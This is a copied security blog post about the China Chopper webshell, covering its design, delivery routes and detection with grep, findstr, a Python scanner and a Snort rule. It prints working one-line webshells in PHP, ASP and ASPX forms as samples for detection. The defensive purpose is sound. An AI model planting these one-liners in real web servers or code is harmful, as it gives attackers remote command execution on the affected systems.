# China Chopper webshell

Copied from Andrea Fortuna's website; <https://www.andreafortuna.org/2018/03/28/what-is-the-china-chopper-webshell-and-how-to-find-it-on-a-compromized-system/>

## What is the China Chopper Webshell, and how to find it on a compromised system?

March 28, 2018

Some days ago, during a chat with a friend who works in a small software development company, the topic of webshells came up.

During the migration of a production system, my friend found some suspicious **.php** files, which turned out to be **China Chopper webshells**.

**A simple software upgrade turned into a cybersecurity nightmare.**

### What is China Chopper?

**China Chopper** is a **4KB** Web shell first discovered in **2012**.

It is widely used by Chinese and other malicious actors, including **APT** groups, to remotely access compromised Web servers.

The webshell consists mainly of two parts, the client interface (**caidao.exe**) and a small file placed on the compromised web server.

#### Why is this webshell so dangerous and hard to find?

The file dropped on the compromised server is really small. For example, the **PHP** version (the file found by my friend) consists of a single line of code:

```
<?php @eval($_POST['password']);?>
```

Even with limited access to the compromised host, it is very simple for an attacker to write this small piece of code into a file, and there is nothing on the server to analyse beyond that one line: the code to execute arrives in the POST body of every request, and the file simply hands it to `eval`.

All the logic is delegated to the client (**caidao.exe**), which communicates directly with the file dropped on the web server and provides a lot of interesting features, like a **file explorer**, a **database client**, an **interactive command shell** and a **“Security Scan”** useful for brute-force password guessing against authentication portals.

An analysis of **caidao.exe** is available here: <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>

The China Chopper can run on any web server that is capable of running **JSP**, **ASP**, **ASPX**, **PHP**, or **CFM**, on both **Windows** and **Linux**.

Because the payload is so small, the delivery mechanism can be very flexible; for example:

* WebDAV file upload
* **JBoss jmx-console** or **Apache Tomcat** management pages
* Cross-site scripting (**XSS**)
* **SQL** injection
* Vulnerabilities in applications/services
* File processing vulnerabilities
* Remote file include (**RFI**) and local file include (**LFI**) vulnerabilities
* Lateral propagation from other access

**This OS and application flexibility makes this an even more dangerous Web shell.**

### How can I detect this webshell on my web server?

The quickest and easiest method is a regular expression search. On a Linux machine, a recursive `grep -E` (the `egrep` of older systems) across your web directory can help identify infected files (for the **.php** version):

```
grep -rE --include='*.php' '<\?php\s*@eval\(\$_(POST|GET|REQUEST)\[.+\]\);\s*\?>' /var/www
```

Note that this only matches the canonical one-liner: a shell with extra whitespace, a different superglobal than the three listed, or base64-wrapped code will slip past it, so treat a clean result as triage rather than proof, and inspect every hit (and the recent modification times in the same directory) by hand.

On a Windows machine, you can search files with regular expressions using the native `findstr` command:

```
findstr /R /S "[<][?]php.\@eval[(]\$_POST.*[)];[?][>]" *.php
```

and for **.aspx** version:

```
findstr /R /S "[<]\%\@.Page.Language=.Jscript.\%[>][<]\%eval.Request\.Item.*unsafe" *.aspx
```
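To scan a whole web root for the PHP, ASP and ASPX one-liners in one pass, here is an added Python example (my code, not the original post's or FireEye's). It generalises the regexes above: it tolerates whitespace and quoting variations, accepts `$_GET` and `$_REQUEST` as well as `$_POST`, matches the classic ASP form `<%eval request("password")%>` documented in the FireEye report the post cites, and reports the parameter name the client must know. The directory tree it scans, with its file names and contents, is constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Patterns modelled on the page's egrep/findstr searches, loosened to tolerate
# whitespace and quoting differences. Group "param" captures the request
# parameter the shell evals, i.e. the "password" the caidao client must send.
PATTERNS = {
    "php": re.compile(
        r"<\?php\s*@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[\s*(?P<param>[^\]]+?)\s*\]\s*\)\s*;?\s*\?>",
        re.IGNORECASE,
    ),
    # Classic ASP form from the FireEye report: <%eval request("password")%>
    "asp": re.compile(
        r"<%\s*eval\s*\(?\s*request\s*\(\s*(?P<param>[^)]+?)\s*\)\s*\)?\s*%>",
        re.IGNORECASE,
    ),
    # ASPX form matched by the findstr search above
    "aspx": re.compile(
        r'<%@\s*Page\s+Language\s*=\s*"Jscript"\s*%>\s*<%\s*eval\s*\(\s*Request\.Item\s*\[\s*(?P<param>[^\]]+?)\s*\]\s*,\s*"unsafe"\s*\)',
        re.IGNORECASE,
    ),
}


def scan_file(path: Path) -> list:
    """Return one hit dict per webshell pattern found in the file."""
    try:
        data = path.read_bytes()
    except OSError:
        return []
    text = data.decode("utf-8", errors="replace")
    hits = []
    # Every pattern is tried against every file: the extension is attacker-chosen,
    # and a PHP shell behind a .png.php or .phtml name must still be found.
    for family, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append({
                "path": str(path),
                "family": family,
                "line": text.count("\n", 0, m.start()) + 1,
                "param": m.group("param").strip("'\" "),
                "size": len(data),  # the real shells are a few dozen bytes
            })
    return hits


def scan_tree(root) -> list:
    """Walk a web root and collect hits from every regular file."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file():
            hits.extend(scan_file(p))
    return hits


# Constructed sample tree: a benign file, the canonical PHP one-liner, a
# whitespace/$_REQUEST variant the page's grep would miss, and the ASP/ASPX forms.
SAMPLES = {
    "index.php": "<?php\necho 'hello';\n",
    "uploads/cache.php": "<?php @eval($_POST['password']);?>",
    "img/logo.png.php": '<?php  @eval( $_REQUEST[ "cmd" ] ); ?>',
    "old/default.asp": '<%eval request("pass")%>',
    "bin/debug.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
}


def build_demo_tree(root) -> None:
    """Write the constructed samples under a temporary web root."""
    for rel, body in SAMPLES.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body, encoding="utf-8")


def demo() -> list:
    """Scan the constructed tree; returns (relative path, family, param) tuples."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return sorted(
            (Path(h["path"]).relative_to(tmp).as_posix(), h["family"], h["param"])
            for h in scan_tree(tmp)
        )


if __name__ == "__main__":
    for hit in demo():
        print(*hit)
```

Point `scan_tree` at the real document root (and at any upload, cache or temp directory the application can write to) rather than at the demo tree; a hit on a file that was modified recently, by the web server's own user, is the one to pull first.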

### How can the malicious network traffic be detected?

You can use the **Snort IDS** signature [published by FireEye](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf). It keys on `FromBase64String`, the .NET call in the stage that the client sends to the **ASPX** shell, together with the `z1` argument parameter of the first command, so it covers the ASPX variant over cleartext HTTP; the PHP client stage uses `base64_decode` instead, and traffic over HTTPS is invisible to the sensor unless it is decrypted in front of it:

```
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS 
(msg: "China Chopper with first Command Detected";
flow:to_server,established; content: "FromBase64String";
content: "z1"; content:"POST"; nocase;http_method;
reference:url,http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html;
classtype:web-application-attack; sid: 900000101;)
```

### References

* <https://informationonsecurity.blogspot.it/2012/11/china-chopper-webshell.html>
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>
* <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>
* <http://blog.opensecurityresearch.com/2012/09/manually-exploiting-tomcat-manager.html>
* <https://www.hybrid-analysis.com/sample/be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77?environmentId=100>
